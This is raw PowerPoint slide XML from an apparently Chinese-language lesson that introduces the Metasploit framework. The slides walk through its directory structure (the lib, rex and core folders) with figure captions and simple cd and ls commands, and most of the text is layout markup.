          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5604510" y="1312545"/>
            <a:ext cx="5276850" cy="1543050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="文本框 112"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5604510" y="2940685"/>
            <a:ext cx="5080000" cy="1428750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>                       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-2 目录文件情况2.进入msf库文件（lib)，如图2-4-3所示。rex是框架中的基本库，用于处理套接字、协议、文本转换等。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5652135" y="4369435"/>
            <a:ext cx="5229225" cy="1990725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="文本框 113"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5604510" y="6360160"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-3 msf库文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7030A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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>了解 Metasploit文件结构</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤二</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5081905" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.1 认识Metasploit</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="文本框 113"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="361315" y="3335020"/>
            <a:ext cx="5268595" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3.使用“cd usr/share/metasploit-framework/lib/msf/core”命令进入core目录，并用“ls”命令查看该目录下的文件，如图2-4-4所示。在core目录下存放着基本的API接口文件。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5935980" y="127635"/>
            <a:ext cx="4890135" cy="6002020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="文本框 114"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5935980" y="6129655"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-4 core目录下的文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7030A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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>了解 Metasploit文件结构</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤二</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5081905" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
